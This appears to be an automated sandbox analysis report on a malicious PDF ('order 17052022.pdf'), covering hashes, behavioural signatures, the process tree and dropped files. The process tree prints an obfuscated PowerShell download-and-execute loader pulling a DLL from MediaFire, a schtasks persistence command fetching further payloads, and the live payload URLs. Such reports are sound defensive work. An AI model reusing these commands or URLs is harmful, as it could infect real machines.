Analysis
- max time kernel: 111s
- max time network: 113s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 17-05-2022 19:24
Behavioral task behavioral1
- Sample: order 17052022.pdf
- Resource: win7-20220414-en
Behavioral task behavioral2
- Sample: order 17052022.pdf
- Resource: win10v2004-20220414-en
General
- Target: order 17052022.pdf
- Size: 30KB
- MD5: f7da10c601fc5c0c2caef9f4e06508ad
- SHA1: b1f40f4752866c30fbd6654f4844d13ae2958946
- SHA256: 0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0
- SHA512: 999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3
Malware Config
- Extracted: https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file
Signatures
- Executes dropped EXE (1 IoC)
  Processes: PID 4992 ddond.com
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: msedge.exe: Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run
- Drops file in Program Files directory (2 IoCs)
  Processes: setup.exe: File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cc12dc4b-a323-437b-9e64-571415a0833e.tmp; File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220517212452.pma
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 5 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: AcroRd32.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz. POWERPNT.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 6 IoCs)
  Processes: msedge.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName. POWERPNT.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
- Kills process with taskkill (3 IoCs)
  Processes: PID 5860 taskkill.exe; PID 5928 taskkill.exe; PID 3828 taskkill.exe
- Modifies Internet Explorer settings
  Processes: AcroRd32.exe: Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
- Modifies registry class (2 IoCs)
  Processes: msedge.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\; Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: PID 5572 POWERPNT.EXE
- Suspicious behavior: EnumeratesProcesses (30 IoCs)
  Processes: PID 1188 msedge.exe (2 entries); PID 1748 msedge.exe (2 entries); PID 64 AcroRd32.exe (18 entries); PID 4500 msedge.exe (2 entries); PID 5176 msedge.exe (2 entries); PID 5252 msedge.exe (2 entries); PID 5360 identity_helper.exe (2 entries)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  Processes: PID 4500 msedge.exe (6 entries)
- Suspicious use of FindShellTrayWindow (20 IoCs)
  Processes: PID 64 AcroRd32.exe (1 entry); PID 4500 msedge.exe (19 entries)
- Suspicious use of SetWindowsHookEx (13 IoCs)
  Processes: PID 64 AcroRd32.exe (6 entries); PID 5176 AdobeARM.exe (1 entry); PID 5572 POWERPNT.EXE (6 entries)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID and process -> target PID and process): 64 AcroRd32.exe -> 216 RdrCEF.exe (3 entries); 216 RdrCEF.exe -> 3648 RdrCEF.exe (repeated entries); 64 AcroRd32.exe -> 3484 msedge.exe (2 entries); 216 RdrCEF.exe -> 4336 RdrCEF.exe (repeated entries)
Processes (indented by parent/child relationship)
- "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"
  Signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    Signatures: Suspicious use of WriteProcessMemory
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=56EC53DF2B66CBC934083B75DF6946BE --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=844C07BE9E116AF808E5ECFD12437D25 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=844C07BE9E116AF808E5ECFD12437D25 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:1
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FED20838FB90D99B288D239A6DEDE4A5 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6D09F45E2CD1C838820AD835962F84C0 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23538A52D9CE8B9B15013A64AF1D2646 --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
  - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
      Signatures: Suspicious behavior: EnumeratesProcesses
  - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
    Signatures: Adds Run key to start application; Enumerates system info in registry; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
      Signatures: Suspicious behavior: EnumeratesProcesses
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 /prefetch:8
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4072 /prefetch:8
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5928 /prefetch:8
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
    - "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
      Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx
      - C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file
        Signatures: Executes dropped EXE
        - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM
        - "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""
          Signatures: Creates scheduled task(s)
        - "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
          Signatures: Kills process with taskkill
        - "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          Signatures: Kills process with taskkill
        - "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
          Signatures: Kills process with taskkill
    - "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
    - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
    - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      Signatures: Drops file in Program Files directory
      - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff759d75460,0x7ff759d75470,0x7ff759d75480
    - "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
    - "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
    - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
  - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
    Signatures: Suspicious use of SetWindowsHookEx
    - "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
- C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Downloads
- C:\ProgramData\ddond.com
  Filesize: 14KB
  MD5: 0b4340ed812dc82ce636c00fa5c9bef2
  SHA1: 51c97ebe601ef079b16bcd87af827b0be5283d96
  SHA256: dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
  SHA512: d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
Filesize 471B
MD5 1fca0539de02091fc4d207211364e566
SHA1 61a6af3a2153a70277b7de7495ecef4110bb9989
SHA256 e6a9491850b7d6fc6bd7d592a8ff4fc057952a137abb7d3d39b3d0bb3b8f667b
SHA512 a1a657812f96ef839d793ffb6f249765ed24e906f5b3a22872c52e5b687480fdd7cc2334956e42198d70fa931f77ef50cbc8e1aaae6959ba3036a9035eeea823
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize 471B
MD5 61bbc21b6075c76df0e0ed177c534185
SHA1 efcec703b65ae25e95736755f0fd80cdb5569c13
SHA256 0c2f98b4f41006d5bee3534e07ff7047cffd42c7f53f4ce6861d458e96457164
SHA512 a31af35f8fb5a566fa02c40156693db6ba54d75b8a3e3acac65cbc9e1d4eb9ea627f395bacfb3ac0b9854d9ef29f0e16ea958ebfe8201cff70096ff90ef61727
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
Filesize 471B
MD5 c6f11751f23f273c02be06f64ca0e2f2
SHA1 43dd2140da95c53f964ef88db67187451581625f
SHA256 063e20533cd1e709c8c1965ccd1cfbff2b3c6a37683f03a244da1a5101a3bc81
SHA512 23e69bede2c1fee2f559f00aeb69c122f4c987c76d6455fa1ff484dc23008566b02edd93ee6a57c179c71e71114a0638c948900b4fff5b731ff99e81cbeae001
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
Filesize 434B
MD5 6756c40edf649ec888c0e888446cacb9
SHA1 59ad25a4a9ff545995b5bcce1abd411e7f07060a
SHA256 794f4be6bac263da5983ef90891f923230f14f15b4c68b60c2248b834f0526d2
SHA512 af6022b791d65c83d50205c498dd8fd76d70e8cf7563b373024fd9887b8d9400d4b6cfd7cd72084a94447127afc1e1a3de28984af5eef1ae2a2ef182354a1ac9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize 442B
MD5 bfa52515350fe02ef978aed07e758049
SHA1 95972681781c46b22c5adc90bffed1e94f09d64c
SHA256 d584b8348f562647b43f0769750b05bafe94194188fe695aea3b1fff3c334eff
SHA512 28ba9afed478d4ab4f413de12040b27d7966eaa6958b96fa57bf430ad4a95f94cf3866f7a5e6e44b559ca5b30d383b26248d10ecdf5232194c786ef79f9f3245
-
